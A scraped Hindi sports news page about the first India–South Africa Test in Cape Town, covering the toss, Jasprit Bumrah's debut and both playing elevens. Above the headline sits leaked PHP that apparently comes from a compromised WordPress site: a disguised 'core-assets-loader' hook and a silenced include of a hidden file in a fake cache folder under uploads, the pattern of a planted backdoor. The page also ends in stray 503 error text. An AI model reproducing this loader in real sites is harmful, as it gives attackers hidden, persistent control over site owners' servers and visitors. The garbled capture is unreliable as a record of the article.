add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पहले केपटाउन टेस्ट में साउथ अफ्रीका ने टॉस जीतकर चुनी बल्लेबाज़ी, बुमराह का डेब्यू – SOCH INDIA
Menu

खेल
पहले केपटाउन टेस्ट में साउथ अफ्रीका ने टॉस जीतकर चुनी बल्लेबाज़ी, बुमराह का डेब्यू

nobanner

साल 2017 में धमाकेदार प्रदर्शन के बाद अब साल 2018 में भारत और दक्षिण अफ्रीका की टीमें एक बार फिर से जलवा बिखेरने को तैयार है. केपटाउन के न्यू लैंड्स मैदान पर खेले जा रहे पहले टेस्ट मुकाबले में मेजबान दक्षिण अफ्रीका ने टॉस जीतकर पहले बल्लेबाज़ी करने का फैसला लिया है.

कप्तान विराट कोहली ने आज दक्षिण अफ्रीकी जमीं पर टीम इंडिया के शॉर्टर फॉर्मेट के स्पेशलिस्ट जसप्रीत बुमराह को टेस्ट कैप देने का फैसला लिया है. साथ ही उप-कप्तान अजिंक्ये रहाणे को बाहर रख एक और चौंकाने वाला फैसला लिया है. इसके साथ ही टीम मैनेजमेंट ने आज प्लेइंग इलेवन से रविन्द्र जडेजा, केएल राहुल, अजिंक्ये रहाणे, उमेश यादव और पार्थिव पटेल को बाहर रखा है.

बेहतरीन फॉर्म में चल रही भारतीय टीम आज दक्षिण अफ्रीका के खिलाफ न्यूलैंड्स में पहला टेस्ट मैच खेलने उतर रही है. दोनों टीमों के लिए यह मैच किसी अग्नि परीक्षा से कम नहीं है.

भारत के जिम्मे विदेसी जमीं पर अपने रिकार्ड को सुधारने की जिम्मेदारी है तो दक्षिण अफ्रीका के सामने विश्व की बेहतरीन टीम है.

भारत ने पिछली नौ टेस्ट सीरीज में जीत दर्ज कर आस्ट्रेलिया के लगातार नौ टेस्ट सीरीज जीतने के विश्व रिकार्ड की बराबरी की है. भारत ने 2015 से कोई भी टेस्ट सीरीज नहीं हारी है.

लेकिन, भारत दक्षिण अफ्रीका में 1992 से एक भी सीरीज नहीं जीता है. उसने इस दौरान चार सीरीज गंवाई हैं और एक सीरीज ड्रॉ खेली है. भारत ने महेंद्र सिंह धोनी की कप्तानी में 2010-11 में सीरीज ड्रॉ की थी.

बल्लेबाजी में भारत का दारोमदार चेतेश्वर पुजारा और विराट कोहली के ऊपर सबसे ज्यादा होगा. इन दोनों ने 2017 में काफी रन बनाए हैं. पुजारा बीते साल सबसे ज्यादा रन बनाने वाले बल्लेबाजों में दूसरे और कोहली चौथे स्थान पर रहे हैं.

वहीं सलामी बल्लेबाज लोकेश राहुल और मुरली विजय शानदार फॉर्म में है.

भारत को इस दौरे पर सबसे ज्यादा उम्मीदें अपने तेज गेंदबाजी आक्रमण से हैं. उसके पास मोहम्मद शमी, ईशांत शर्मा, भुवनेश्वर कुमार, जसप्रीत बुमराह के रूप में बेहतरीन तेज गेंदबाजी आक्रमण है. एकदिवसीय के दिग्गज तेज गेंदबाज जसप्रीत बुमराह को पहली बार टेस्ट टीम में शामिल किया गया है.

वहीं टेस्ट में दूसरे नंबर पर काबिज दक्षिण अफ्रीका अपने घर में हर लिहाज से हावी है, लेकिन वो जानती है कि भारतीय टीम बेहद मजबूत मानसिकता और बेहतरीन संतुलन के साथ उसे चुनौती देने आई है.

मेजबानों की बल्लेबाज अब्राहम डिविलियर्स, फाफ डु प्लेसिस, हाशिम अमला के इर्द गिर्द है. क्विंटन डी कॉक भी उसके लिए अहम योगदान दे सकते हैं.

गेंदबाजी में वह डेल स्टेन, क्रिस मौरिस की वापसी से मजबूत हुई है. इन दोनों के अलावा उसके पास वार्नोन फिलेंडर, कागिसो रबाडा जैसे घातक गेंदबाज हैं जो भारत को परेशानी में डाल सकते हैं.

टीम:
भारत: विराट कोहली (कप्तान), मुरली विजय, शिखर धवन. चेतेश्वर पुजारा, रोहित शर्मा, हार्दिक पांड्या, रिद्धिमान साहा (विकेटकीपर), रविचंद्रन अश्विन, मोहम्मद शमी, जसप्रीत बुमराह, भुवनेश्वर कुमार.

दक्षिण अफ्रीका: डीन ऐल्गर, मार्कराम, आमला, एबी डीविलियर्स, फाफ डूप्लेसी, क्विंटन डी कॉक, फिलेंडर, केशव महाराज, स्टेन, मोर्कल, रबाडा

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.